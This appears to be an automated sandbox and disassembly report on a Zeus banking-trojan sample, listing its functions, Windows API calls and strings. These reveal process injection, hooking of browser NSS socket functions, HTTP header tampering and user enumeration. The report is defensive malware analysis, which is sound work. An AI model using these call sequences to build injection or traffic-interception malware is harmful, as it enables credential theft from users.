FCIDestroy, xrefs: 004170FB
FCICreate, xrefs: 004170CF
FCIFlushCabinet, xrefs: 004170E9
cabinet.dll, xrefs: 004170B0

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041C095, Relevance: 19.8, APIs: 9, Strings: 4, Instructions: 254

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040776D), ref: 00412635

EnterCriticalSection.KERNEL32(00423FE4), ref: 0041C0BC
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C11A

Part of subcall function 00411049: EnterCriticalSection.KERNEL32(00422AC8), ref: 00411064
Part of subcall function 00411049: LeaveCriticalSection.KERNEL32(00422AC8), ref: 004110E7
Part of subcall function 00411049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004111B2
Part of subcall function 00411049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 004113EC

LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C161

Part of subcall function 0041835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 004183B8

Part of subcall function 004182E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 0041831F

LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C2CC
EnterCriticalSection.KERNEL32(00423FE4), ref: 0041C2EB
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C34D

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C376
EnterCriticalSection.KERNEL32(00423FE4), ref: 0041C395
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C3DD

Strings

identity, xrefs: 0041C1DF
Accept-Encoding, xrefs: 0041C1EB
If-Modified-Since, xrefs: 0041C20F
?B, xrefs: 0041C0B6

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004050A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(004223AC,0000FDE9,?), ref: 0040515C

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

LeaveCriticalSection.KERNEL32(004223AC,?,000000FF), ref: 004051B7
EnterCriticalSection.KERNEL32(004223AC), ref: 004051D2
getpeername.WS2_32 ref: 0040527F

Part of subcall function 0041681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 00416840

Strings

YIST, xrefs: 0040523A
]QPG, xrefs: 0040522A
YISQ, xrefs: 004050EF
\[EP, xrefs: 004050E8
OMAV, xrefs: 00405232
Z\AV, xrefs: 00405248
EASV, xrefs: 00405250

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B50A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(Function_000223AC,0000FDE9,?), ref: 003B515C

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

LeaveCriticalSection.KERNEL32(Function_000223AC,?,000000FF), ref: 003B51B7
EnterCriticalSection.KERNEL32(Function_000223AC), ref: 003B51D2
getpeername.WS2_32 ref: 003B527F

Part of subcall function 003C681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 003C6840

Strings

EASV, xrefs: 003B5250
YISQ, xrefs: 003B50EF
Z\AV, xrefs: 003B5248
\[EP, xrefs: 003B50E8
YIST, xrefs: 003B523A
]QPG, xrefs: 003B522A
OMAV, xrefs: 003B5232

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041D0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 0041D107
GetProcAddress.KERNEL32(00000000,?), ref: 0041D128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0041D159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0041D17C
FreeLibrary.KERNEL32(00000000), ref: 0041D1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0041D1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0041D212

Part of subcall function 00407125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00407138
Part of subcall function 00407125: PathUnquoteSpacesW.SHLWAPI(?), ref: 004071A0
Part of subcall function 00407125: ExpandEnvironmentStringsW.KERNEL32(?,0041D23A,00000104), ref: 004071AD
Part of subcall function 00407125: LocalFree.KERNEL32(?,.exe,00000000), ref: 004071C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 0041D2AB

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 004189C2: PathSkipRootW.SHLWAPI(0041CA1A), ref: 004189CD
Part of subcall function 004189C2: GetFileAttributesW.KERNEL32(0041CA1A,?,C:\Users\admin\AppData\Roaming,0041CA4A,C:\Users\admin\AppData\Roaming), ref: 004189F5
Part of subcall function 004189C2: CreateDirectoryW.KERNEL32(0041CA1A,00000000,?,C:\Users\admin\AppData\Roaming,0041CA4A,C:\Users\admin\AppData\Roaming), ref: 00418A03

Part of subcall function 0041C912: LoadLibraryW.KERNEL32(?), ref: 0041C929
Part of subcall function 0041C912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D2A8), ref: 0041C955
Part of subcall function 0041C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?), ref: 0041C96C
Part of subcall function 0041C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?), ref: 0041C984
Part of subcall function 0041C912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?,00000000), ref: 0041C9A1
Part of subcall function 0041C912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?,00000000), ref: 0041CA0D

NetApiBufferFree.NETAPI32(?), ref: 0041D2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041D2E2

Part of subcall function 0041786B: PathAddExtensionW.SHLWAPI(00000000,00000000), ref: 004178AC
Part of subcall function 0041786B: GetFileAttributesW.KERNEL32(00000000,00000000,00000006,00000000,?,.exe), ref: 004178B9

Strings

.exe, xrefs: 0041D1BB, 0041D267, 0041D2EE

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CD0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 003CD107
GetProcAddress.KERNEL32(00000000,?), ref: 003CD128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 003CD159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 003CD17C
FreeLibrary.KERNEL32(00000000), ref: 003CD1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 003CD1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 003CD212

Part of subcall function 003B7125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 003B7138
Part of subcall function 003B7125: PathUnquoteSpacesW.SHLWAPI(?), ref: 003B71A0
Part of subcall function 003B7125: ExpandEnvironmentStringsW.KERNEL32(?,003CD23A,00000104), ref: 003B71AD
Part of subcall function 003B7125: LocalFree.KERNEL32(?,.exe,00000000), ref: 003B71C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 003CD2AB

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

Part of subcall function 003C89C2: PathSkipRootW.SHLWAPI(?), ref: 003C89CD
Part of subcall function 003C89C2: GetFileAttributesW.KERNEL32(?,?,00000000,003CD261,?,?,?,?,?), ref: 003C89F5
Part of subcall function 003C89C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,003CD261,?,?,?,?,?), ref: 003C8A03

Part of subcall function 003CC912: LoadLibraryW.KERNEL32(?), ref: 003CC929
Part of subcall function 003CC912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,003CD2A8), ref: 003CC955
Part of subcall function 003CC912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,003CD2A8,?,?), ref: 003CC96C
Part of subcall function 003CC912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,003CD2A8,?,?), ref: 003CC984
Part of subcall function 003CC912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,003CD2A8,?,?,00000000), ref: 003CC9A1
Part of subcall function 003CC912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,003CD2A8,?,?,00000000), ref: 003CCA0D

NetApiBufferFree.NETAPI32(?), ref: 003CD2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 003CD2E2

Part of subcall function 003C786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 003C78AC
Part of subcall function 003C786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 003C78B9

Strings

.exe, xrefs: 003CD1BB, 003CD267, 003CD2EE

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CC095, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254

APIs

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

EnterCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC0BC
LeaveCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC11A

Part of subcall function 003C1049: EnterCriticalSection.KERNEL32(003D2AC8), ref: 003C1064
Part of subcall function 003C1049: LeaveCriticalSection.KERNEL32(003D2AC8), ref: 003C10E7
Part of subcall function 003C1049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 003C11B2
Part of subcall function 003C1049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 003C13EC

LeaveCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC161

Part of subcall function 003C835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 003C83B8

Part of subcall function 003C82E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 003C831F

LeaveCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC2CC
EnterCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC2EB
LeaveCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC34D

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

LeaveCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC376
EnterCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC395
LeaveCriticalSection.KERNEL32(Function_00023FE4), ref: 003CC3DD

Strings

Accept-Encoding, xrefs: 003CC1EB
identity, xrefs: 003CC1DF
If-Modified-Since, xrefs: 003CC20F

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C3048, Relevance: 18.1, APIs: 12, Instructions: 138

APIs

Part of subcall function 003C20C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 003C2105
Part of subcall function 003C20C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 003C21DB
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 003C21FA
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 003C220C
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 003C221E
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 003C2230
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 003C2242
Part of subcall function 003C20C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 003C2254
Part of subcall function 003C20C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 003C228D
Part of subcall function 003C20C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 003C229C
Part of subcall function 003C20C4: InitializeCriticalSection.KERNEL32(003D400C,?,?,00000000), ref: 003C22C9
Part of subcall function 003C20C4: WSAStartup.WS2_32(00000202,?), ref: 003C22DF
Part of subcall function 003C20C4: CreateEventW.KERNEL32(003D2C30,00000001,00000000,00000000,?,?,00000000), ref: 003C2300
Part of subcall function 003C20C4: GetLengthSid.ADVAPI32(00000000,000000FF,003D2C08,?,?,00000000), ref: 003C2335
Part of subcall function 003C20C4: GetCurrentProcessId.KERNEL32(00000000,0194F7D0,00000000,?,?,00000000), ref: 003C2362

SetErrorMode.KERNEL32(00008007,00000000), ref: 003C306F
GetCommandLineW.KERNEL32(?), ref: 003C3079
CommandLineToArgvW.SHELL32(00000000), ref: 003C3080
LocalFree.KERNEL32(00000000), ref: 003C30D5

Part of subcall function 003BE0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 003BE108
Part of subcall function 003BE0FB: GetThreadDesktop.USER32(00000000), ref: 003BE10F
Part of subcall function 003BE0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 003BE128

Part of subcall function 003B5BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,003C30F6), ref: 003B5C03
Part of subcall function 003B5BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,003C30F6), ref: 003B5C0A
Part of subcall function 003B5BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,003C30F6), ref: 003B5C1C
Part of subcall function 003B5BF6: SetEvent.KERNEL32(003D2868,?,00000001), ref: 003B5C69
Part of subcall function 003B5BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 003B5C76

Part of subcall function 003BDF74: DeleteObject.GDI32(00000000), ref: 003BDF87
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BDF97
Part of subcall function 003BDF74: TlsFree.KERNEL32(00000000,00000000,003D2868,00000000,003BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 003BDFA2
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BDFB0
Part of subcall function 003BDF74: UnmapViewOfFile.KERNEL32(00000000,00000000,003D2868,00000000,003BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 003BDFBA
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BDFC7
Part of subcall function 003BDF74: SelectObject.GDI32(00000000,00000000), ref: 003BDFE1
Part of subcall function 003BDF74: DeleteObject.GDI32(00000000), ref: 003BDFF2
Part of subcall function 003BDF74: DeleteDC.GDI32(00000000), ref: 003BDFFF
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BE010
Part of subcall function 003BDF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003BE01F
Part of subcall function 003BDF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 003BE038

Part of subcall function 003C2B08: GetModuleHandleW.KERNEL32(?), ref: 003C2B1F
Part of subcall function 003C2B08: GetProcAddress.KERNEL32(00000000,?), ref: 003C2B41

Part of subcall function 003C2D01: CreateMutexW.KERNEL32(003D2C30,00000001,?,32901130,?,00000001,?), ref: 003C2D91
Part of subcall function 003C2D01: GetLastError.KERNEL32 ref: 003C2DA3
Part of subcall function 003C2D01: CloseHandle.KERNEL32(000001E6), ref: 003C2DBA
Part of subcall function 003C2D01: ExitWindowsEx.USER32(00000014,80000000), ref: 003C2DFD
Part of subcall function 003C2D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 003C2E1C
Part of subcall function 003C2D01: SetEvent.KERNEL32(00000000), ref: 003C2E29
Part of subcall function 003C2D01: CloseHandle.KERNEL32(00000000), ref: 003C2E30
Part of subcall function 003C2D01: CloseHandle.KERNEL32(000001E6), ref: 003C2E42
Part of subcall function 003C2D01: ReadProcessMemory.KERNEL32(000000FF,003E0014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 003C2EA6
Part of subcall function 003C2D01: Sleep.KERNEL32(000001F4), ref: 003C2EB8
Part of subcall function 003C2D01: IsWellKnownSid.ADVAPI32(0194F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 003C2EC9
Part of subcall function 003C2D01: ReadProcessMemory.KERNEL32(000000FF,003E0014,00000000,00000001,00000000), ref: 003C2EF1
Part of subcall function 003C2D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 003C2F0D
Part of subcall function 003C2D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 003C2F50
Part of subcall function 003C2D01: CreateEventW.KERNEL32(003D2C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 003C2FCE
Part of subcall function 003C2D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 003C2FE7
Part of subcall function 003C2D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 003C2FF7
Part of subcall function 003C2D01: CloseHandle.KERNEL32(0000000C), ref: 003C300D
Part of subcall function 003C2D01: CloseHandle.KERNEL32(?), ref: 003C3013
Part of subcall function 003C2D01: CloseHandle.KERNEL32(?), ref: 003C3016

Sleep.KERNEL32(000000FF,?,00000001), ref: 003C312B
ExitProcess.KERNEL32(00000000,00000000), ref: 003C313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 003C3157

Part of subcall function 003C2542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 003C2574
Part of subcall function 003C2542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,003C316D,?,00000000,?,?,00000000), ref: 003C25AB
Part of subcall function 003C2542: WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,003C316D,?,00000000,?,?,00000000), ref: 003C25CB
Part of subcall function 003C2542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,003C316D,?,00000000), ref: 003C261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00795903,00000000,00000000,00000000), ref: 003C3185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 003C3198
CloseHandle.KERNEL32(?), ref: 003C31A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 003C31B5
CloseHandle.KERNEL32(00000000), ref: 003C31BC

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040DF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 0040DF87
CloseHandle.KERNEL32(00000000), ref: 0040DF97
TlsFree.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFA2
CloseHandle.KERNEL32(00000000), ref: 0040DFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFBA
CloseHandle.KERNEL32(00000000), ref: 0040DFC7
SelectObject.GDI32(00000000,00000000), ref: 0040DFE1
DeleteObject.GDI32(00000000), ref: 0040DFF2
DeleteDC.GDI32(00000000), ref: 0040DFFF
CloseHandle.KERNEL32(00000000), ref: 0040E010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040E01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0040E038

Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DD9
Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DE2

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BDF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 003BDF87
CloseHandle.KERNEL32(00000000), ref: 003BDF97
TlsFree.KERNEL32(00000000,00000000,003D2868,00000000,003BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 003BDFA2
CloseHandle.KERNEL32(00000000), ref: 003BDFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,003D2868,00000000,003BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 003BDFBA
CloseHandle.KERNEL32(00000000), ref: 003BDFC7
SelectObject.GDI32(00000000,00000000), ref: 003BDFE1
DeleteObject.GDI32(00000000), ref: 003BDFF2
DeleteDC.GDI32(00000000), ref: 003BDFFF
CloseHandle.KERNEL32(00000000), ref: 003BE010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003BE01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 003BE038

Part of subcall function 003C4DCA: CloseHandle.KERNEL32(00000000), ref: 003C4DD9
Part of subcall function 003C4DCA: CloseHandle.KERNEL32(00000000), ref: 003C4DE2

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0041A6AF, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 165

APIs

Part of subcall function 0041A594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0041A5F4

Part of subcall function 00411049: EnterCriticalSection.KERNEL32(00422AC8), ref: 00411064
Part of subcall function 00411049: LeaveCriticalSection.KERNEL32(00422AC8), ref: 004110E7
Part of subcall function 00411049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004111B2
Part of subcall function 00411049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 004113EC

SetLastError.KERNEL32(00002F78), ref: 0041A6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0041A762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0041A77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0041A795
EnterCriticalSection.KERNEL32(00423F24), ref: 0041A79D
LeaveCriticalSection.KERNEL32(00423F24,?), ref: 0041A853

Part of subcall function 00415048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0041506A
Part of subcall function 00415048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0041508C
Part of subcall function 00415048: InternetCloseHandle.WININET(?), ref: 00415094

Part of subcall function 00411C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 00411C81
Part of subcall function 00411C3C: CloseHandle.KERNEL32(?), ref: 00411C9A

EnterCriticalSection.KERNEL32(00423F24), ref: 0041A87A
LeaveCriticalSection.KERNEL32(00423F24,?), ref: 0041A8BA

Part of subcall function 00419C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00423F24,0041A893,?), ref: 00419CB1

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

$?B, xrefs: 0041A797
$?B, xrefs: 0041A85B

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00411F98, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(00423FB4,00000000,76C61857,00000000), ref: 00411FAF
InitializeCriticalSection.KERNEL32(00422AC8), ref: 00411FE4

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00412029
CloseHandle.KERNEL32(00000000), ref: 0041203A

Part of subcall function 00419D6D: InitializeCriticalSection.KERNEL32(00423F24,00000000,7718F8FF), ref: 00419D8F
Part of subcall function 00419D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 00419E63

Part of subcall function 0041B4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 0041B4F0

InitializeCriticalSection.KERNEL32(004223AC), ref: 00412081

Part of subcall function 0040E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0040E108
Part of subcall function 0040E0FB: GetThreadDesktop.USER32(00000000), ref: 0040E10F
Part of subcall function 0040E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0040E128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00412093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 0041209E

Part of subcall function 0040C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,004120A9), ref: 0040C111
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,004120A9), ref: 0040C125
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040C132
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040C13F
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040C14C

Strings

nss3.dll, xrefs: 00412099
nspr4.dll, xrefs: 0041208E

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00414CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00414CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00414D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00414D19
CreateProcessAsUserW.ADVAPI32(?,00000000,0041C8F5,00000000,00000000,00000000,0041C8F5,0041C8F5,00000000,?,?,?,00000000,00000044), ref: 00414D8A
CloseHandle.KERNEL32(?), ref: 00414D9D
CloseHandle.KERNEL32(?), ref: 00414DA2
FreeLibrary.KERNEL32(?), ref: 00414DB9

Strings

DestroyEnvironmentBlock, xrefs: 00414D0F
userenv.dll, xrefs: 00414CE6
CreateEnvironmentBlock, xrefs: 00414D07

Memory Dump Source

